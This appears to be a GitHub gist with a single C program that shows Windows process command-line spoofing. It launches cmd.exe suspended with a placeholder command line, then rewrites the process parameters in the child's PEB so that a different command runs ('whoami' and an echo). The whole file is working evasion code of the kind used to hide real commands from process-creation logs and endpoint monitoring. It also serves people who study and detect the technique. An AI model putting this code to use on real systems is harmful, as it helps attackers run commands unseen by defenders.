Last active
December 23, 2020 19:17
-
-
Save Inndy/a2f9490a3d2227b21d193463750368ae to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stddef.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <winternl.h> | |
| int main(void) { | |
| int ret = 0; | |
| PROCESS_INFORMATION PI = { 0 }; | |
| STARTUPINFOW SI = { 0 }; | |
| CONTEXT CTX = { CONTEXT_FULL }; | |
| RTL_USER_PROCESS_PARAMETERS processParam; | |
| PEB peb; | |
| memset(&SI, 0, sizeof(SI)); | |
| SI.cb = sizeof(SI); | |
| WCHAR dummyInput[] = L"???????????????????????????????????????????????????????????????????????????????"; | |
| WCHAR new_szCmdlineUnicode[] = L"cmd /c whoami & echo P1ay Win32 L!k3 a K!ng. & pause"; | |
| if (!CreateProcessW(L"C:\\Windows\\SysWow64\\cmd.exe", dummyInput, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, &SI, &PI)) { | |
| puts("CreateProcessW failed"); | |
| return 1; | |
| } | |
| if (!GetThreadContext(PI.hThread, &CTX)) { | |
| puts("GetThreadContext failed"); | |
| return 2; | |
| } | |
| ReadProcessMemory(PI.hProcess, (LPVOID)CTX.Ebx, &peb, sizeof(peb), 0); | |
| RTL_USER_PROCESS_PARAMETERS *remote_ProcessParam = (RTL_USER_PROCESS_PARAMETERS *)peb.ProcessParameters; | |
| printf("ProcessParameters at %p\n", peb.ProcessParameters); | |
| ReadProcessMemory(PI.hProcess, (LPVOID)remote_ProcessParam, &processParam, sizeof(processParam), 0); | |
| //////////////////////////////////////////////////////////////////////////////// | |
| MEMORY_BASIC_INFORMATION mbi; | |
| VirtualQueryEx(PI.hProcess, remote_ProcessParam, &mbi, sizeof(mbi)); | |
| LPVOID local_buff = VirtualAlloc(NULL, mbi.RegionSize + 0x1000, MEM_COMMIT, PAGE_READWRITE); | |
| ReadProcessMemory(PI.hProcess, (LPVOID)remote_ProcessParam, local_buff, mbi.RegionSize, 0); | |
| if(!VirtualFreeEx(PI.hProcess, remote_ProcessParam, 0, MEM_RELEASE)) { | |
| puts("VirtualFreeEx failed"); | |
| ret = 3; | |
| goto kill; | |
| } | |
| LPVOID allocated = VirtualAllocEx(PI.hProcess, remote_ProcessParam, mbi.RegionSize + 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
| if(allocated != remote_ProcessParam) { | |
| puts("VirtualAllocEx failed"); | |
| ret = 4; | |
| goto kill; | |
| } | |
| *(ULONG*)((char *)local_buff + 4) = mbi.RegionSize + 0x1000; | |
| memcpy((char *)local_buff + mbi.RegionSize, new_szCmdlineUnicode, wcslen(new_szCmdlineUnicode) * 2 + 2); | |
| UNICODE_STRING *s = &((RTL_USER_PROCESS_PARAMETERS*)local_buff)->CommandLine; | |
| s->Buffer = (LPWSTR)((char *)remote_ProcessParam + mbi.RegionSize); | |
| s->Length = wcslen(new_szCmdlineUnicode) * 2; | |
| s->MaximumLength = s->Length + 2; | |
| if(!WriteProcessMemory(PI.hProcess, remote_ProcessParam, local_buff, mbi.RegionSize + 0x1000, 0)) { | |
| ret = 5; | |
| goto kill; | |
| } | |
| VirtualFree(local_buff, 0, MEM_RELEASE); | |
| //////////////////////////////////////////////////////////////////////////////// | |
| printf("[+] run...\n\n"); | |
| MessageBoxA(NULL, "RUN", "RUN", MB_ICONINFORMATION); | |
| ResumeThread(PI.hThread); | |
| WaitForSingleObject(PI.hProcess, 5000); | |
| return 0; | |
| kill: | |
| TerminateProcess(PI.hProcess, 0); | |
| return ret; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment